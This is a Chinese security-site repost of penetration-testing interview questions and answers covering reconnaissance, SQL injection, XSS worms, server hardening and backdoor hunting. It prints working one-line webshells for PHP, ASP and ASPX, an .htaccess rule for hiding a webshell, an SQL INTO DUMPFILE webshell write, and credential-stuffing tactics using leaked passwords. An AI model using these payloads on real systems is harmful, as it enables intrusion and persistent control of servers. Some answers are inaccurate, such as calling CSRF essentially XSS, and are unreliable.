HW面经3

admin 2025年3月26日19:10:53评论12 views字数 3441阅读11分28秒阅读模式

问题1:拿到一个待检测的站,你觉得应该先做什么?

答案:--收集信息:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说..

问题2:在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

答案:

1) 丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台

2) 用邮箱做关键词进行丢进搜索引擎

3) 利用搜索到的关联信息找出其他邮箱进而得到常用社交账号

4) 社工找出社交账号,里面或许会找出管理员设置密码的习惯

5) 利用已有信息生成专用字典

6) 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西

问题3:常见的网站服务器容器?

答案:

--IISApachenginxTomcat,weblogicjboss

问题4:拿到一个webshell发现网站根目录下有.htaccess文件,我们能做什么?

答案:--能做的事情很多,用隐藏网马来举例子:

插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>

.jpg文件会被解析成.php文件

问题5:注入漏洞只能查账号密码?

答案:--可脱裤,可上传webshell,可执行命令

问题6:安全狗会追踪变量,从而发现出是一句话木马吗?

答案:--是根据特征码,所以很好绕过

问题7CSRFSSRF和重放攻击有什么区别?

答案:

1)CSRF是跨站请求伪造攻击,由客户端发起

2)SSRF是服务器端请求伪造,由服务器发起

3)重放攻击是将截获的数据包进行重放,达到身份认证等目的

问题8:说出至少三种业务逻辑漏洞,以及修复方式?

答案:

1)密码找回漏洞中存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码

2)身份认证漏洞中最常见的是会话固定攻击和Cookie 仿冒,只要得到Session Cookie 即可伪造用户身份

3)验证码漏洞中存在验证码允许暴力破解、验证码可以通过Javascript 或者改包的方法来进行绕过

问题9:你常用的渗透工具有哪些,最常用的是哪个?

答案:

burpsuit,appscan,avwvs,sqlmap,fiddler

问题10:谈谈你经常关注的安全平台?

答案:

如,tools.net,90sec,先知社区,安全客,freebuf

问题11sqlmap,怎么对一个注入点注入?

答案:

1)如果是get型号,直接,sqlmap -u "诸如点网址".

2)如果是post型诸如点,可以sqlmap -u "注入点网址” --data="post的参数"

3)如果是cookieX-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r "文件地址"

问题12sql注入的几种类型?

答案:

1)报错注入

2)bool型注入

3)延时注入

4)宽字节注入

问题13:盲注和延时注入的共同点?

答案:

都是一个字符一个字符的判断

问题14sql注入写文件都有哪些函数?

答案:

(1)select '一句话' into outfile '路径'

(2)select '一句话' into dumpfile '路径'

(3) select '<?php eval($_POST[1]) ?>' into dumpfile'd:wwwrootbaidu.comnvhack.php';

问题15owasp 漏洞都有哪些?

答案:

1)SQL注入防护方法:

2)失效的身份认证和会话管理

3)跨站脚本攻击XSS

4)直接引用不安全的对象

5)安全配置错误

6)敏感信息泄露

7)缺少功能级的访问控制

8)跨站请求伪造CSRF

9)使用含有已知漏洞的组件

10)未验证的重定向和转发

问题16SQL注入防护方法?

答案:

1)使用安全的API

2)对输入的特殊字符进行Escape转义处理

3)使用白名单来规范化输入验证方法

4)对客户端输入进行控制,不允许输入SQL注入相关的特殊字符

5)服务器端在提交数据库进行SQL查询之前,对特殊字符进行过滤、转义、替换、删除。

问题17:简述Linux系统安全加固需要做哪些方面?

答案:

1.密码安全策略

2.关闭不必要的端口和服务

3.文件权限的设置等

问题18:你使用什么工具来判断系统是否存在后门?

答案:

pchunter攻击查看进程和服务

问题19LinuxSelinux是什么?

答案:

如何设置SelinuxSELinux是一种安全子系统,它能控制程序只能访问特定文件

使用setup工具进入图形化关闭搜索或者修改/etc/sysconfig/selinux 文件SELINUX=disabled

防火墙打开使用service iptables start或则/etc/init.d/iptables start

问题20mysql表权限里面,除了增删改查,文件读写,还有哪些权限?

答案:

排序,查询,索引等

问题21mysql安全要如何做?

答案:

Mysql账户权限安全

Mysql数据的网络安全配置

密码策略安全

Mysql日志

Mysql数据库服务所在主机安全配置

部署SQL注入检测、防御模块

mysqld安全相关启动选项

mysql备份策略

问题22mysql数据库默认有哪些库?说出库的名字?

答案:

1.mysql库,存储用户等信息

2.information_schema,存储表、锁等性能信息

3.testmysql自建测试库

4.performance_schema,互斥锁等信息(5.6之前需要手动开启,从5.6开始默认开启)

问题23CSRF漏洞的本质是什么?

答案:

本质就是xss

问题24:如果给你一个XSS漏洞,你还需要哪些条件可以构造一个蠕虫?

答案:存储型的xss,并且需要访问量大的页面或者关注按钮,如微博,论坛等

问题25:在社交类的网站中,哪些地方可能会出现蠕虫?

答案:微博关注,社交报告调查,贴吧评论等

问题26:手工查找后门木马的小技巧?

答案:

1)首先最需要注意的地方是系统的启动项,可以在“运行”-输入“msconfig命令”在打开的系统配置实用程序里的启动列表查看,并且服务也要注意一下,如果对电脑不是太熟悉的童鞋建议使用360安全卫士的开机加速功能,来查看有无异常的可以启动项和服务项,因为在后门木马中99%都会注册自己为系统服务,达到开机自启动的目的,如果发现可疑项直接打开相应的路径,找到程序文件,直接删除并且禁止自启动;

2)查看系统关键目录system32和系统安装目录Windows下的文件,xp系统下两者默认路径分别是C:WINDOWSsystem32C:WINDOWS。然后最新修改的文件中有没有可疑的可执行文件或dll文件,这两个地方都是木马最喜欢的藏身的地方了(小提示:一定要设置显示所有的文件的文件夹哦)。

3)观察网络连接是否存在异常,还有“运行”-cmd-netstat -an”查看有没有可疑或非正常程序的网络连接,如果对电脑不是很熟悉建议大家使用360的流量监控功能更加直观和方便,尤其注意一下远程连接的端口,如果有类似于8000等端口就要注意了,8000是灰鸽子的默认端口,记得有一次自己就在后门木马测试中在网络连接中发现8000端口,当然意思不是说只要没有8000端口的网络连接就一定安全,因为8000端口只是灰鸽子上线的默认端口,并且端口是可以更改的。

4)通过以上方法,可以查找到电脑的一些可疑文件,如果确认无疑,就可以手工进行删除了。当然还可以借助杀毒软件的力量。如果你真的中了木马后门,不用慌。最好最彻底的方法是重装系统后,在安全模式下,利用最新病毒库的杀软进行查杀。

问题27:常用的一句话木马?

答案:

asp一句话木马:

<%execute(request("value"))%>

php一句话木马:

<?php @eval($_POST[value]);?>

变形:

<?php $x=$_GET[‘z’];@eval(“$x;”);?>

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["value"])%>

问题28Web服务器被入侵后,怎样进行排查?

答案:

1)查看下web 服务器日志

2)看看有没有异常端口开放,

3)使用安全狗等服务器安全软件清扫。

原文始发于微信公众号(励行安全):HW面经3

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月26日19:10:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HW面经3https://cn-sec.com/archives/3887231.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息